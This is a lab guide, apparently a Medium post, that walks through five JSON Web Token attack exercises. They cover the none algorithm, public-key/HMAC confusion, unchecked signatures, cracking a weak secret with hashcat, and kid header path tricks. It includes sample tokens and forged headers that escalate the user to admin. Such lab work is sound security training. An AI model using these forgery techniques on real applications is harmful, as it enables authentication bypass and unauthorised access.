JSON Web Token — Lab Guide

  • None Algorithm [Very Easy]
  • Exposed Key [Easy]
  • Signature Not Checked [Very Easy]
  • Weak Signature [Medium]
  • Vulnerable Kid [Medium]
  1. Cookie Editor
  2. Understanding of how JSON Web Tokens are made and constructed.

For testing JSON Web Tokens always do the following step.

  1. Break up the token to header.body.signature format
Header:eyJhbGciOiJSUzI1NiJ9
Body:eyJuYW1lIjoiZGluZ2xlIn0
Signature:r_7APNqnpntDjvrxyGYRwMv6M6DNzWW9vXhF9gvVBuUHx5ZRma57l2Y_xHysy4nYyAHorK7_6rcKVO3tRegG9vxu5BRLaV5ILQ_z8lHmb3M0-IA4mGEQOHnp2YTfMTm66HmBQKDrdnu9Linz9K4D_518IUhdGKO2omuqfI9UE9pnoh5f1k2Bo3wXX4eJv8IleZHxBkEf_FKlgpZ_SFmwlEI9IiQ8KPqU0mz3ZOAI2ftQn42FxdndBaVWSy71PsPb4OEyCIAAMJaqKAtRQLiwG33PbI5jS12gMTOOW8VsIZloN1ET2OzGOJLKgCx3AzFwMByQn5v3jvp55jsJKE0u-g
Decoded Header:{"alg":"RS256"}
Decoded Body: {"name":"dingle"}

1 — None Algorithm

  1. None algorithm should be available
  1. Change RS256 to None.
  2. Change “dingle” to “admin”.
  3. Remove the signature.

2 — Exposed Key + HMAC Algorithm

  1. The public key.
  2. HMAC verification should be possible (HS256)
  1. Save the key into a file.
  2. Change the header algorithm to HS256 and body user to admin
  3. Use HS256 algorithm to sign the new payload.
When generating a public key, there is another line at the end of the file. Be sure that the extracted key has the same format to create the correct signature.

3 — Signature Not Checked:

  • Signatures are not verified.
  1. Change the JWT so the signature is invalid and test it.
  2. Change the body so you become the admin user.

4 — Weak Signature:

  • Hashcat
  • Weak key to sign the signature.
  • HMAC used to sign the payload.
  1. Extract the cookie. This can be done on cookie-manager
eyJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiZGluZ2xlIn0.Xco8m4tJC24_F7YEmRjKa9jSbHBzR4wfJDVAtpgZw_I
hashcat -a0 -m 16500 text.hash [dict]
Hashcat cracks the secret key.

5 — Vulnerable Kid:

  • Kid variable
  • Exposed File
  • HMAC used to create the signature.
  1. Extract the JWT and examine the header and body.
header: eyJraWQiOiJyc2FfcHJpdmF0ZSIsImFsZyI6IkhTMjU2In0
decoded header:
{
"kid": "rsa_private",
"alg": "HS256"
}
body: eyJuYW1lIjoiZGluZ2xlIn0
decoded body:
{
"name": "dingle"
}
Upon visiting the site we see the following text. Due to the way Ruby on Rails works, we can ignore the navigation bar as it is part of a different file in the layouts section.
header: eyJraWQiOiJhcHAvdmlld3MvYXV0aGVudGljYXRpb24vcmFuZG9tLmh0bWwuZXJiIiwiYWxnIjoiSFMyNTYifQ
decoded header:
{
"kid": "app/views/authentication/random.html.erb",
"alg": "HS256"
}
body: eyJuYW1lIjoiYWRtaW4ifQ
decoded body:
{
"name": "admin"
}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store